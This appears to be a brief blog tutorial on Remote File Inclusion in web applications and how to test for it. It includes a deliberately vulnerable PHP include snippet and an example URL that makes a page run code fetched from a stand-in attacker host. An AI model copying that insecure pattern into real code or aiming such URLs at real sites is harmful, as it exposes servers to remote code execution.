Remote File Inclusion (RFI)
Remote
File Inclusion (RFI) is an attack technique used to exploit "dynamic
file include" mechanisms in web applications. When web
applications take user input (URL, parameter value, etc.) and pass
them into file include commands, the web application might be tricked
into including remote files with malicious code. This
vulnerability occurs, for example, when a page receives, as input,
the path to the file that has to be included and this input is not
properly sanitized, allowing external URL to be injected. Although
most examples point to vulnerable PHP scripts, we should keep in mind
that it is also common in other technologies such as JSP, ASP and
others.
Testing
for RFI
Since
RFI occurs when paths passed to "include" statements are
not properly sanitized, in a blackbox testing approach, we should
look for scripts which take filenames as parameters.
$incfile
= $_REQUEST["file"];
include($incfile.".php");
In
this example the path is extracted from the HTTP request and no input
validation is done
http://vulnerable_host/vuln_page.php?file=http://attacker_site/malicous_page In this case a remote file located in some other site is executed in the vulnerable site.
Comments
Post a Comment